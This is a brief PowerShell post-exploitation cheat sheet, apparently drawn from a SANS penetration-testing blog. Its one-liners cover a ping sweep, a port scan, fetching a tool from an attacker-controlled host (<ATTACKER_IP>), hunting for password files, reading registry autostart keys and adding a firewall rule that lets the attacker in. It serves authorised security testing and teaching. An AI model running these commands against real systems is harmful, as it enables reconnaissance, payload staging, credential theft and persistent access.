# PowerShell Reference Sheet
*Source: https://www.sans.org/blog/sans-pen-test-cheat-sheet-powershell/*

## Post-Exploitation
* Ping sweep
```
PS C:\> 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}
```
* Port scan
```
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.1",$_)) "Port $_ is open!"} 2>$null
```
* Fetch a file over HTTP
```
PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://<ATTACKER_IP>/file.exe","nc.exe")
```
* Find files with a specific name
```
PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt
```
* Navigate the Windows registry
```
PS C:\> cd HKLM: \
PS HKLM:\> ls
```
* List programs configured to autostart in the registry
```
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run
```
* List and modify firewall rules
```
PS C:\> Get-NetFirewallRule -all
PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -RemoteAddress <ATTACKER_IP>
```